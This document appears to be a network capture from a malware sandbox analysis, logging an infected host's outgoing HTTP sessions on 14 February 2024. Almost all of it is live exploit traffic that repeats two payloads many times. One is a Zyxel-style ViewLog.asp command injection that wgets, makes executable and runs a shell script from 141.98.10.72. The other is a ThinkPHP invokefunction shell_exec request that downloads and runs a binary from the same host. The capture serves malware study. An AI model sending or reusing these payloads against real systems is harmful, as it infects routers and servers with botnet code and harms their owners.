                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.20.1</center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      97192.168.2.154092062.60.211.1158080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:05.622576952 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:05.925508976 CET113INHTTP/1.1 404 Not Found
                                                      Date: Wed, 14 Feb 2024 08:29:05 GMT
                                                      Content-Length: 0
                                                      Connection: close


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      98192.168.2.154271895.255.93.9280
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:05.627978086 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      99192.168.2.155071495.141.128.20080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:05.664028883 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:29:05.936533928 CET339INHTTP/1.1 400 Bad Request
                                                      Server: nginx/1.18.0 (Ubuntu)
                                                      Date: Wed, 14 Feb 2024 08:29:05 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 166
                                                      Connection: close
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      100192.168.2.1553612112.47.11.21080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:05.762312889 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:29:06.160509109 CET192INHTTP/1.1 404 Not Found
                                                      Content-Length: 0
                                                      X-NWS-LOG-UUID: 8051582542529074328
                                                      Connection: close
                                                      Server: Lego Server
                                                      Date: Wed, 14 Feb 2024 08:29:05 GMT
                                                      X-Cache-Lookup: Return Directly
                                                      Feb 14, 2024 09:29:06.361078978 CET1INData Raw: 0d
                                                      Data Ascii:


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      101192.168.2.154464231.136.108.1068080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:05.792690039 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:06.490919113 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:07.834794998 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:10.682770014 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:16.058500051 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:26.810244083 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:50.105664015 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:33.112344980 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      102192.168.2.155139685.31.112.1288080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:05.794888973 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      103192.168.2.154520295.231.183.48080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:05.806380033 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:06.042174101 CET878INHTTP/1.1 404
                                                      Content-Type: text/html;charset=utf-8
                                                      Content-Language: en
                                                      Content-Length: 682
                                                      Date: Wed, 14 Feb 2024 08:29:05 GMT
                                                      Keep-Alive: timeout=20
                                                      Connection: keep-alive
                                                      Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 62 6f 64 79 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 68 31 2c 20 68 32 2c 20 68 33 2c 20 62 20 7b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 68 31 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 68 32 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 68 33 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 70 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 20 61 20 7b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 7d 20 2e 6c 69 6e 65 20 7b 68 65 69 67 68 74 3a 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 68 72 20 63 6c 61 73 73 3d 22 6c 69 6e 65 22 20 2f 3e 3c 70 3e 3c 62 3e 54 79 70 65 3c 2f 62 3e 20 53 74 61 74 75 73 20 52 65 70 6f 72 74 3c 2f 70 3e 3c 70 3e 3c 62 3e 44 65 73 63 72 69 70 74 69 6f 6e 3c 2f 62 3e 20 54 68 65 20 6f 72 69 67 69 6e 20 73 65 72 76 65 72 20 64 69 64 20 6e 6f 74 20 66 69 6e 64 20 61 20 63 75 72 72 65 6e 74 20 72 65 70 72 65 73 65 6e 74 61 74 69 6f 6e 20 66 6f 72 20 74 68 65 20 74 61 72 67 65 74 20 72 65 73 6f 75 72 63 65 20 6f 72 20 69 73 20 6e 6f 74 20 77 69 6c 6c 69 6e 67 20 74 6f 20 64 69 73 63 6c 6f 73 65 20 74 68 61 74 20 6f 6e 65 20 65 78 69 73 74 73 2e 3c 2f 70 3e 3c 68 72 20 63 6c 61 73 73 3d 22 6c 69 6e 65 22 20 2f 3e 3c 68 33 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 39 2e 30 2e 37 35 3c 2f 68 33 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                      Data Ascii: <!doctype html><html lang="en"><head><title>HTTP Status 404 Not Found</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 404 Not Found</h1><hr class="line" /><p><b>Type</b> Status Report</p><p><b>Description</b> The origin server did not find a current representation for the target resource or is not willing to disclose that one exists.</p><hr class="line" /><h3>Apache Tomcat/9.0.75</h3></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      104192.168.2.154020694.120.5.2058080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:05.818274021 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      105192.168.2.154575294.120.160.718080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:05.818572044 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      106192.168.2.1546436112.29.170.23980
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:06.146719933 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      107192.168.2.154440895.171.211.688080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:06.561089993 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:06.818679094 CET109INHTTP/1.1 302 Found
                                                      Location: https://192.168.0.14:443/cgi-bin/ViewLog.asp
                                                      Connection: close


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      108192.168.2.155851094.123.73.838080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:06.580446959 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      109192.168.2.155095085.233.76.988080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:06.580446959 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:09.658715963 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:15.802678108 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:27.834167957 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:52.153512001 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      110192.168.2.155887895.230.167.358080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:06.779339075 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:07.005017042 CET339INHTTP/1.1 400 Bad Request
                                                      Date: Wed, 14 Feb 2024 08:29:06 GMT
                                                      Server: Boa/0.94.14rc21
                                                      Accept-Ranges: bytes
                                                      Connection: close
                                                      Content-Type: text/html; charset=ISO-8859-1
